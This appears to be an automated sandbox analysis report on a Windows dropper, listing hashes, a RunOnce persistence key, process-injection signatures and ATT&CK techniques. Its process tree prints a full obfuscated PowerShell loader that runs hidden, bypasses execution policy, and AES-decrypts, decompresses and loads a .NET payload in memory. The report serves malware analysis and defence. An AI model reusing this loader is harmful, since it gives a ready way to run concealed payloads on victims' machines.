e149c6e690c79f77e57290d9b8262a4dfaac67c248dbb83fe9dfedd9c9eeafaa

Resubmissions

10/02/2023, 22:59

230210-2yskbahe71 7

10/02/2023, 22:48

230210-2q3ejshe88 7

Analysis

max time kernel
1321s
max time network
1374s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
10/02/2023, 22:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe
Size

14.8MB
MD5

274069bb41e7093eb4802f0a8c8ae123
SHA1

835b054cf117944407b5f909a8c065f4619cd01c
SHA256

8609a8a1efc7a4d2c0282ce10bc25b409a416c8cc9cf7c677ca2ccb1302d994f
SHA512

1d9b99b68ad422e29c5fc23e8291153581ebb375c641885e5f94ed688b6ab75a3d09c43e953255a7d955501a4797eec79467a144fc0fc2b97b04b4ec69660a39
SSDEEP

6144:6ahONp0yN90QECH6qXA7g5Zo4cfqcOzYxH1hJHhUfmGedmfFnX4sEK:6ily90YaqcgUacOUx9HhOFeE9nIlK

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3184	Up.bat.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3184	Up.bat.exe
3184	Up.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3184	Up.bat.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4516 wrote to memory of 3876	4516	8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe	77
PID 4516 wrote to memory of 3876	4516	8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe	77
PID 3876 wrote to memory of 3184	3876	cmd.exe	79
PID 3876 wrote to memory of 3184	3876	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe
"C:\Users\Admin\AppData\Local\Temp\8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4516
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c Up.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe
    "Up.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $SaAbs = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat').Split([Environment]::NewLine);foreach ($UFyiL in $SaAbs) { if ($UFyiL.StartsWith(':: ')) { $YQujV = $UFyiL.Substring(3); break; }; };$RazOX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YQujV);$MjptO = New-Object System.Security.Cryptography.AesManaged;$MjptO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MjptO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MjptO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jd47GHuiydSoko9oLdGQxC9WO8IZyj5IWAA4bz8g7is=');$MjptO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5uySHjMtqAtyGaRnEWTbpQ==');$PqYhT = $MjptO.CreateDecryptor();$RazOX = $PqYhT.TransformFinalBlock($RazOX, 0, $RazOX.Length);$PqYhT.Dispose();$MjptO.Dispose();$shGEU = New-Object System.IO.MemoryStream(, $RazOX);$CoAGN = New-Object System.IO.MemoryStream;$mQWhw = New-Object System.IO.Compression.GZipStream($shGEU, [IO.Compression.CompressionMode]::Decompress);$mQWhw.CopyTo($CoAGN);$mQWhw.Dispose();$shGEU.Dispose();$CoAGN.Dispose();$RazOX = $CoAGN.ToArray();$pJsJl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($RazOX);$RHiDW = $pJsJl.EntryPoint;$RHiDW.Invoke($null, (, [string[]] ('')))
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat

Filesize
450.0MB

MD5
2ab94aa86594eca58d642dd64be93b2b

SHA1
ba969f3e392eb1d93eaa40972bb01c2127dd5e84

SHA256
b4c174a6da244980457cfb09ef25eae827d151264fa837ae8c0b6351d7ee42bf

SHA512
7ff30cb915af868ff4176dfb465799c395175635626190ff61812a59924e96c0cf5c238a5ebd42c70423ddb2f8313e75b63b6e02ca2cc5e33a2a09255faf3397

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/3184-136-0x0000022272F40000-0x0000022272F62000-memory.dmp

Filesize
136KB

Download
memory/3184-137-0x00007FFF68990000-0x00007FFF69451000-memory.dmp

Filesize
10.8MB

Download
memory/3184-138-0x00007FFF68990000-0x00007FFF69451000-memory.dmp

Filesize
10.8MB

Download
memory/3184-139-0x00007FFF68990000-0x00007FFF69451000-memory.dmp

Filesize
10.8MB

Download